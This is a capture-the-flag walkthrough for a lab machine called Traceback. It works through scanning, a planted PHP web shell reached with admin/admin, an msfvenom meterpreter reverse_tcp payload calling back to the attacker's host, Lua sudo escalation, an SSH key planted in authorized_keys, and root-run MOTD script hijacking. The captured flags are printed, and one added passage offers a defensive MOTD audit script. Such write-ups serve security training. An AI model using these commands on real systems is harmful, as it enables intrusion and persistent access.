Solution for user
IP=10.10.10.181
nmap -sT -p 1-65535 $IP
...
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Spider for website content
URL="http://10.10.10.181"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
...
http://10.10.10.181/.hta (Status: 403)
http://10.10.10.181/.htaccess (Status: 403)
http://10.10.10.181/.htpasswd (Status: 403)
http://10.10.10.181/index.html (Status: 200)
http://10.10.10.181/server-status (Status: 403)
Information gathering
whatweb "$URL"
/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete
http://10.10.10.181 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.181], Title[Help us]
View page source code
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<!--Some of the best web shells that you might need ;)-->
Look for a web shell
cd /usr/share/wordlists
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Common-PHP-Filenames.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
WL=/usr/share/wordlists/Common-PHP-Filenames.txt
gobuster dir -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
#Nothing found
WL=/usr/share/wordlists/CommonBackdoors-PHP.fuzz.txt
gobuster dir -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
...
http://10.10.10.181/smevk.php (Status: 200)
We found a web shell at http://10.10.10.181/smevk.php
Find the credentials for the web shell
Basic guessing…
Try admin/admin
It works...
Obtain a reverse shell
KALI_IP=x.x.x.x
LISTENER_PORT=4444
msfvenom -p php/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > php_shell.php
Upload php_shell.php using the web shell GUI.
Start the listener
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 4444
set ExitOnSession false
exploit -j -z
Go to http://10.10.10.181/php_shell.php
sessions -l -v
sessions -i 1
sysinfo
Computer : traceback
OS : Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64
Meterpreter : php/linux
We got a meterpreter shell.
shell
whoami
webadmin
cd /home/webadmin
ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
Lua is a programming language.
cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
Escalate privileges using Lua
https://gtfobins.github.io/gtfobins/lua/
echo 'os.execute("/bin/bash")' > /tmp/cmd.lua
sudo -u sysadmin /home/sysadmin/luvit /tmp/cmd.lua
whoami
sysadmin
Get user flag
cat /home/sysadmin/user.txt
9baf9db465099a6dabd8fb3bcd7a5d3f
Solution for root
To make it easier to work with, add my Kali public key to sysadmin’s authorized keys.
On Kali
cat /root/.ssh/id_rsa.pub
On target
echo 'ssh-rsa AAAA...jBBc= root@machine' >> authorized_keys
On Kali
ssh -i ~/.ssh/id_rsa sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
/bin/bash
sysadmin@traceback:~$
Much better… 😉
# Find writable files / dirs outside of your home directory
find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/10-help-text
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/80-esm
...
Investigate the interesting welcome message…
Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each login. The MOTD (Message of the Day) works like this: when a user logs into the box, they are presented with a message, and these scripts generate it.
grep -Ril "XH4H" / 2>/dev/null
/etc/update-motd.d/00-header
/var/www/html/index.html
/var/backups/.update-motd.d/00-header
/var/run/motd.dynamic
cd /etc/update-motd.d
ls -la
...
-rwxrwxr-x 1 root sysadmin 981 Jul 2 12:56 00-header
-rwxrwxr-x 1 root sysadmin 982 Jul 2 12:56 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Jul 2 12:56 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Jul 2 12:56 80-esm
-rwxrwxr-x 1 root sysadmin 299 Jul 2 12:56 91-release-upgrade
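The listing above is the whole problem: files that pam_motd runs as root are group-writable by sysadmin. As an added defender-side check (not part of the original writeup), the script below audits a MOTD directory for exactly that condition; it assumes GNU coreutils stat (-c), and the directory path is illustrative.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a MOTD script directory
# for scripts that pam_motd runs as root but that a non-root owner or a
# non-root group (or anyone) can modify. Assumes GNU coreutils stat.

# check_motd_entry OWNER GROUP MODE
# MODE is the 10-char symbolic mode from `ls -l` / `stat -c %A`, e.g. -rwxrwxr-x.
# Prints the reasons the entry is unsafe; empty output means it passed.
check_motd_entry() {
    owner=$1; group=$2; mode=$3; reason=""
    [ "$owner" != root ] && reason="owner=$owner"
    # character 6 of the symbolic mode is the group write bit
    case "$mode" in
        ?????w????) [ "$group" != root ] && reason="$reason group-writable($group)" ;;
    esac
    # character 9 is the world write bit
    case "$mode" in
        ????????w?) reason="$reason world-writable" ;;
    esac
    printf '%s' "${reason# }"
}

# audit_motd_dir DIR
# Runs the check on every regular file in DIR; prints each offender and
# returns 1 if any were found, 0 if the directory is clean.
audit_motd_dir() {
    dir=$1; found=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        reason=$(check_motd_entry "$(stat -c %U "$f")" "$(stat -c %G "$f")" "$(stat -c %A "$f")")
        if [ -n "$reason" ]; then
            echo "UNSAFE $f: $reason"
            found=1
        fi
    done
    return $found
}

# Example run on a live host (illustrative path, matches the one in the writeup):
# audit_motd_dir /etc/update-motd.d
```

On the box above every entry would be reported as group-writable(sysadmin), which is the condition to alert on or fix with chmod 755 and a root-owned group.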
Create a script that will be triggered at login by the Message of the Day (MOTD)
nano /home/sysadmin/escalate.sh
#!/bin/bash
cat /root/root.txt
chmod u+x /home/sysadmin/escalate.sh
echo "sh /home/sysadmin/escalate.sh" >> /etc/update-motd.d/00-header
echo "echo Was here..." >> /etc/update-motd.d/00-header
Log in again to trigger the script and display the flag
ssh -i ~/.ssh/id_rsa sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
ba97fda55e7cc0b2d5796bfa6985fab3
ba97fda55e7cc0b2d5796bfa6985fab3